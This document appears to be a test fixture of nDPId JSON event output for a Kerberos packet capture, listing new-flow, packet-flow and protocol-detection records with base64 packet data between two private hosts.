+00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAACmEzJAAIAGfi6sEAgIrBAIyQBYwApFEBigFQs3RFAYAQCNWQAABoWQU5dMx7s3k7lFXcqa6uoE3YqM179MtGFm5Pp0PzGMSHM6ikhCYuxEbF8vf630PDV4M+ymDkgmnA6LZ83pNOsEhGLNGEwQsGjuja+QpA2dd9fjedDg4z2eYZ9DeqXNfMVtviu+Fd00prhwc+9nnU9I900bDPmSAhZM9lsL"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337929983,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337929983,"pkt":"pB9ywglqAAgCHEeuCABFAAEyADpAAIAGkJqsEAjJrBAICMAJAYUOQjJnSJfL+1AYAQBrWQAA8TZc0LDMp13P2bhHUwE3wC3znhyPA6u84KleikgMfgmc3jalHTIxDwXMnjy\/W4F7\/2WZoUcx2XOew9rGWayLePl5BZIz7shN5PFXYJc\/9PAyv29TC7M2XLiMKexhyeYlRE9uvUtK9DAnR\/ttWEC9zdC56cQON1H8q936tfR+Slz7RKm2uwASDHI8fSFcEQQxtgqaAo4BBsj3qlqLB0lXoxQ8eGOcEVy2\/38vMlSj+c\/3tdAxc+T2J+ChqVKK6Ti6p9NJhgfdb6n6Fkr1nJ\/E0PHo7Ab3tBkqkSpNzV9oaIDc\/AnEKYXHdAsdm\/IAEKeNDZ3xj3dnB41oCyCZcvi9r2HqvrS9bMHFZEs="} 
+00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAAD6EzZAAIAGfdasEAgIrBAIyQGFwAlIl8v7DkIzcVAYAQBePQAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1fPlG7bKWdrh2HD6cpz+MijBmfhDcDSHRgxosMnwcbCi1ZRnrViGBtMC2nQv6mVUDSJapX\/mZgtc4l9ALb+\/jokxskSCIt0GZfBXlBh6SOp7g9nc\/2WT4mG5e+fctttNW4KixsBWTLsk4U0TsD"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1549337930192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337930192,"pkt":"pB9ywglqAAgCHEeuCABFAAEXAE9AAIAGkKCsEAjJrBAICMAOAFh1zEKiBQpS4FAYAQB22wAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE6HHTSoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} +00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
+00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1549337930193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337930193,"pkt":"AAgCHEeupB9ywglqCABFAAE+E0ZAAIAGfYKsEAgIrBAIyQBYwA4FClLgdcxDkVAYAQCvKAAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDDGWApgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} +00730{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337930193,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337930214,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAFNAAIAGkEysEAjJrBAICMAPAFhOqMfQDl0Bb1AYAQBFdgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4T+8E3pUi7h1ZsZOoIXjjwvAQAgQGpJXHn0jgIAIbXQei+GxBZQViNO7UVdhzj5KUys1PXrvG2C8wEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETocdNKgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} 
+00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337930214,"pkt":"AAgCHEeupB9ywglqCABFAACYE0tAAIAGfiOsEAgIrBAIyQBYwA8OXQcjTqjJD1AYAQBZNwAAQBgDyB6VZPxID+fu9kcivDlP7463Dy1IfrYrHVzuJLB3P27gpkccW43Mtu3NrktwKAyme0Z0QNo0JvH3ppwCLvPborHS7i5Jp9I5pxLf5LZX6AlmVea2udQa4ufUWkijqzhrShLiqrevOUKPGzj2OQ=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337930217,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337930217,"pkt":"pB9ywglqAAgCHEeuCABFAADBAFlAAIAGkOysEAjJrBAICMAQAFhuA\/SQrSTVxVAYAQACWAAAqoGWMIGToAMCARKigYsEgYhFQhzXcnmj64Ly0uBtjkMUoTuM+x\/rpAOTUWDkUHAspBDcB8geScaOnqOyTgnIEt9ORSbyaLGh7aDpqWoX8LkoU9AsGNn4U6LRjikWi59PfjQn46P9BY0tn6JOEZn\/IKW+bzyhJYK72MU5dfE\/Y9v1QP4pOcMGsyTXEkOUPDq6y5KpwHUNPs1e"} +00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337930217,"pkt":"AAgCHEeupB9ywglqCABFAACmE1FAAIAGfg+sEAgIrBAIyQBYwBCtJNt5bgP1KVAYAQC1BwAApQG9zo7oa2HyeKU61c2m29Ax+Ioczo4ZbPhC81jR0pDanr7lBKhJeMuGW\/uva7FyAslnHaJSlZ\/JCHVy9T8T0Ut1tj8cqy\/o\/YC+6XwQJV1\/l63dulAmK8KMVnuSbTDSVBQ5iahKxwLlZ8cbK3LMBirQeX8FcESDlzlIPsVQ"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930219,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":1,"thread_ts_msec":1549337930219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00960{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":429,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":429,"pkt_l4_len":395,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAGfAF1AAIAGkAqsEAjJrBAICMANwANTRo4+sysn9FAYAQASVgAAOJsrJlDNtr7H4lcner+4Ya97utGtvfHqO\/A9pIIBWDCCAVSgAwIBEqKCAUsEggFHE7YBEd08uXxTAz9oATIBnzsu+CIXQ7IKgHphso5XWVrf1UwI0kS3bNe0YDIltyDk2xHWA\/s5Rnf1JAD5LdMYfWfRtly9XMnusGEqHhr+HUrsB70ut1E9AZfE9oDmCRiRKgSi\/yPqeUdMQ3mTdU1fxpZbOqOrcP2UxT7TverwRJibh+asJMQhC1cH82k0XRAktx95xJlXR3QKNE1DR8fsq9gq2Y16fmA9gsztPUDC4IkAL71ItK34puHol45q2g1+vM2umAkKTXGS4uZkIzxH5rv1eNIbWz6GtEw1jeT5kTsqyd\/cgQicx4yHy9VJKmfjweCCyOHHgJ0JONAYKLNrmUspunn\/qiNj30BsQPTsl8DziFoWtJvBGiR7UAPGmzNl3CewZOrjtG26JZPGTaTuBek+GwxKg7cb\/ze4riey9Wnfq0rUqdvf"} +00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337930219,"pkt":"AAgCHEeupB9ywglqCABFAAFEE1VAAIAGfW2sEAgIrBAIycADwA2zKyf0U0aPtVAYAQCiqgAABQAMBxAAAAAcAagAAgAAANAW0BaHIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbZHvDki757uIRa6348vky4CmSXJcuY8x7Y1L3GMPoboaFC4AmaVBuECBYLv9qMZx8MRhhEX3NAubRHjTv4BhutqH0onvuRNc5YNBgbuLmx\/PeM5pC\/bambRC96DP0B9XtGxHF5b6I04IhLGs2Ss="} 
+00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAF5AAIAGkKSsEAjJrBAICMANwANTRo+1syspEFAYAP\/w8AAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBEJ\/MyGgG2X9jllu+ZB+MxLzLgKVhkidSZOf9UFj0HoVGhQSTvPAIV6ETXdthgzo7fJnzn1QgLAxGW+unJjrxZzV2yGjHgQcBAQE\/\/\/\/\/\/8AAAAAToOoIEtcH3O\/XLUOvcMURw=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931189,"flow_last_seen":1549337931189,"flow_idle_time":7560000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931189,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1549337931189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931189,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAHBAAIAGkHysEAjJrBAICMARAYXGiPwnAgHw6FAYAQD72QAAHIAjHF8ymtjcD1VQuy4UgRChAu\/ekRMgcpsydbeCEgGc8O49XcEm2dIOQUYWz5jyNJ04mLjuLVb5JED7bXFEp0Ouk95kXWAsbhG+yaFiTruRiQNLefpIfBd02fAN9rH6kVBTVFVzTavxG5ZN46Q2CRurERdYtT07E7VAGTF+6yWhKn18+hUxFM5IXiI8jM4osfH687+lmO1gN\/3mr3cymHmPLwvBfLQ9P\/qJ62iSz72gALgVKjnTrFQYtji5UhDqTerpDdd7cbCpV4VyQehZ\/3jzwsKcVZtQElZtM7aiTvqbzIsK7RmP3EZFJoQ\/JIQyyhY="} +00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1549337931190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931190,"pkt":"AAgCHEeupB9ywglqCABFAAD6E2FAAIAGfausEAgIrBAIyQGFwBECAfDoxoj9GVAYAQDO8AAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1TTwhyAF9FVLbWTl8wTaD0aGMw9PDC0vNUorciel2CrkeZRTWRInWV74srNnVapF3vxPYDt7dvyfJVk888MzdKOasNrV1ijuwTfVJ0DIXj985iqAQmj9Mcte2ZOXgI6pFvWB0EEgpCluxB9enG"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931198,"flow_last_seen":1549337931198,"flow_idle_time":7560000,"flow_min_l4_payload_len":113,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":113,"midstream":1,"thread_ts_msec":1549337931198,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1549337931198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1549337931198,"pkt":"pB9ywglqAAgCHEeuCABFAACZAHRAAIAGkPmsEAjJrBAICMASAFgkNdEgXsLgdFAYAQB+8gAAMUMT6Lk9nd3l4g7meOnydVZeUkzRDUCNbnZ+O2nc5UtCJOGQV8MBRj2azOMjgxpQ1tcViooap1+TILjpjhURvLMTREvy8WPkAKcvtuPHKbLtQ3Ir7HNN6Ftdy+KwiOrOLvSrSyEtUhWZxA6KOnwca9s="} +00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1549337931199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1549337931199,"pkt":"AAgCHEeupB9ywglqCABFAABsE2VAAIAGfjWsEAgIrBAIyQBYwBJewuYoJDXRkVAYAQBPlQAA7mWAsz4LwR11oOSQ27Ex06YGG2bAP8ttVVXtAwxS755lCHRg4mUkpOjXnBJJ8KdHDkkp7LWBSVTLf+j0wkJ4hFVjx0c="} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1549337931210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1549337931210,"pkt":"pB9ywglqAAgCHEeuCABFAAXAAHpAAIAGi8ysEAjJrBAICMATAFio5J72SB155lAYAQAvgAAAAAAFlGyCBZAwggWMoQMCAQWiAwIBDKOCBQcwggUDMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DW
avybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjkBvFbBksZRBZsgqvT9rWZWIMz104YLf86+Cksa0ZMsEGJ\/RDcCZOr8kPQRKlwzkm2uQjqkaOemu4sYhWXYr71KrOEs2JUveeWW4HHkLaYXd0a2yOtTAVV1zR76rPVw3Om2DZiy3OdOJiQuRn3tY6sCbzkX\/gKz0r0nI8miItgy4uzP0Z9rEEUiiCUR\/XkOkdTBzoAcDBQBAgQAAohAbDkhBUFBZQ1JBRlQuT1JHoycwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44sbqoEjAQAgESAgERAgEXAgEYAgL\/eQ=="} +00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 
